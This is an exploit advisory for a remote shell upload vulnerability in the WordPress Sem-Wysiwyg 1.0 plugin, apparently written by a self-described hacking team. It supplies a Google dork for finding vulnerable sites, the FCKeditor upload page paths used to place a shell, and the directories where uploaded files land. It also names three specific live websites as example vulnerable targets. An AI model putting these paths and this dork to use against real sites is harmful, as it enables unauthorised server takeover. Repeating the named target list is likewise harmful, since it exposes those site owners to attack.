WordPress Sem-Wysiwyg plugin version 1.0 suffers from a remote shell upload vulnerability.
a76a7d0fcd4124de13b03ba160d1e6de#################################################################################################
# Exploit Title : WordPress Sem-Wysiwyg Plugins 1.0 Remote Shell Upload
Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 20/12/2018
# Vendor Homepage : wordpress.org
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/sem-wysiwyg/fckeditor/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
+ CWE-434- [ Unrestricted Upload of File with Dangerous Type ]
# Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~
ayarsecurity.com [ Friend ]
#################################################################################################
# Exploit :
/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/browser/default/connectors/test.html
/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/browser/default/frmupload.html
# Directory File Path :
/wp-content/uploads/.....
/wp-content/uploads/[YEAR]/[MONTH]/.....
#################################################################################################
# Note : This plugin Sem-Wysiwyg contains a very serious vulnerability that
allowed hackers to gain full control a
modify, upload and execute files on any website running WordPress. With the
plugin installed on a certain website,
a hacker or malicious person can gain access to the web server via HTTP
through a backdoor in the pluginas directory.
#################################################################################################
# Example Vulnerable Sites =>
[+]
peaceofmindbook.com/blog/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
[+]
americanpathways.edu/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
[+]
worklessmakemore.com/blog/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################